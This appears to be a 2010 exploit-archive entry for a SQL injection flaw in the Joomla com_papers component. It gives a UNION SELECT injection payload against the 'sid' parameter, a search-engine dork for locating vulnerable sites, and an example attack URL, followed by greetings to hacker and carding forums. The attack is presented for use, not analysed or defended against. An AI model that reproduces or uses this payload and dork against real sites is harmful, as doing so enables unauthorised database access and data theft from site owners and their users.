Joomla Component com_papers SQL Injection Vulnerability

2010-04-11T00:00:00
ID 1337DAY-ID-11711
Type zdt
Reporter bumble_be
Modified 2010-04-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =======================================================
Joomla Component com_papers SQL Injection Vulnerability
=======================================================

# Exploit Title: joomla component papers SQL injection Vulnerability
# Author: bumble_be
# Software Link: N/A
# Tested on: Windows XP 2

======================================================================
[x] author : bumble_be ([email protected])
[x] dork   : inurl:option=com_papers
[x] myweb  : http://linggau-haxor.com
======================================================================

==== SQLI EXPLOIT ====
/**/ AND /**/ 1=2 /**/ UNION+SELECT /**/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--



==== VULN IN HERE ====

http://localhost/xampp/joomla/index.php?option=com_papers&task=details&sid=943[c0de]



==== LIVE DEMO ====

http://localhost/xampp/joomla/index.php?ption=com_papers&task=details&sid=943 /**/ AND+1=2 /**/ UNION /**/ SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 /*


[x]-------------------------------------------------------------------

GREETZ TO WE FORUM:
DEVILZC0DE.ORG / INDONESIANHACKER.ORG / HACKER-NEWBIE.ORG / PALEMBANGHACKERLINK.ORG / YOGYACARDERLINK.WEB.ID

[x]-------------------------------------------------------------------

MY BROTHA :
mywisdom,whitehat spykid, chaer.newbie, flyff666 , revres tanur , kiddies, petimati, ketek, syntax_error, system_rt0, suddent_death,
eidelweiss , Aaezha, ichito-bandito, kamtiEz, r3m1ck, otong, 3xpL0it, bl4ck_sh4d0w, demnas, RxN and all crew indonesia hacker

[x]-------------------------------------------------------------------

note :mulailah sesuatu dengan ucapan bissmillah

[X]-------------------------------------------------------------------
INDONESIA STILL UP AND WE NOT DEAD :0



#  0day.today [2018-04-09]  #